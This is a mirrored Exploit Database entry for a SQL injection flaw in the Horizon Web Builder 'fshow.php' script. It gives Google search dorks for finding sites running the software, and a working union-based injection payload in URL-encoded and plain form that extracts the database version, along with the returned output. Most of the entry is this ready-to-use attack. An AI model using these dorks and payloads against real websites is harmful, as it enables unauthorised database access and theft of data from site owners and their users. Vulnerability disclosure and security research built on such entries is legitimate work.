Horizon Web Builder – ‘fshow.php’ SQL Injection

Exploit Database
96 阅读

作者： Iolo Morganwg

日期： 2011-05-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17237/

# Exploit Title: Horizon SQLi
# Google Dork: intext:"Site by Horizon"
#: inurl:"uid=HORIZON3"
# Date: 03/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.horizonsolutions.tv/
# Notes: Both params are vulnerable to union based sqli

# Encoded (URL) Example
/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20

# Un-Encoded Example
GET /fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT
CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS
CHAR),CHAR(32)),CHAR(58,99,105,99,58))#HTTP/1.1

# Query Answer
5.1.55-log

last Exploits
Horizon Web Builder – ‘fshow.php’ SQL Injection的更多信息

Manufacturer Website Design Script – SQL Injection：
Chyrp 2.1.1 – ‘ajax.php’ HTML Injection：
Slash CMS – Multiple Vulnerabilities：
ZTE ZXV10 W300 Router – Hard-Coded Credentials：
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting：
WordPress Plugin PureHTML 1.0.0 – SQL Injection：
CollegeManagementSystem-CMS 1.3 – ‘batch’ SQL Injection：
Joomla! Component com_boss – ‘Controller’ Local File Inclusion：